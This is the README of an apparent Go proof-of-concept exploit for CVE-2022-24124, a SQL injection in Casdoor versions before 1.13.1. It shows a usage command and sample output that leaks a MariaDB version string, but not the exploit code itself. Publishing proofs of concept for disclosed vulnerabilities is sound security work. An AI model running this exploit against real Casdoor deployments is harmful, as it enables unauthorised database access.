README
¶
POC for CVE-2022-24124
Exploit Code for CVE-2022-24124 aka Casdoor SQL Injection
Exploit Links: [ExploitDB-50792] [PacketStormSecurity]
Expected outcome: Dump SQL database version on host running Casdoor < 1.13.1
Intended only for educational and testing in corporate environments.
Exploit Usage
Barricade➜ go run exploit.go -u http://127.0.0.1:8080
-=Casdoor SQL Injection (CVE-2022-24124)=-
- by Mayank Deshmukh (ColdFusionX)
[*] Dumping Database Version
XPATH syntax error: .12-MariaDB-0+deb11u1
Documentation
¶
There is no documentation for this package.
Source Files
Click to show internal directories.
Click to hide internal directories.